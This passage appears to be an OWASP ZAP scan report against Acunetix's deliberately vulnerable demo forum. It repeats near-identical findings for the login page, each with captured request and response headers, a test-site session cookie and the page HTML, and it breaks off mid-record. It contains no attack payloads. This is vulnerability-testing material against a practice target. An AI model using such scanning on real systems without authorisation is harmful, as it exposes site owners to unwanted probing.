<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D1" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D10 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <form action="" method="POST"> |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D10 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=10 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:51 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D10" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D11 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <form action="" method="POST"> |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D11 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=11 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:52 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D11" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D12 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <form action="" method="POST"> |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D12 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=12 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:52 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D12" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D13 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <form action="" method="POST"> |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D13 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=13 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:52 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D13" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D14 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <form action="" method="POST"> |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D14 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=14 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:53 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D14" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D15 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <form action="" method="POST"> |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D15 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=15 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:53 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D15" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D16 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <form action="" method="POST"> |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D16 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=16 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:53 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D16" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D17 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <form action="" method="POST"> |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D17 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=17 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:53 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D17" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> 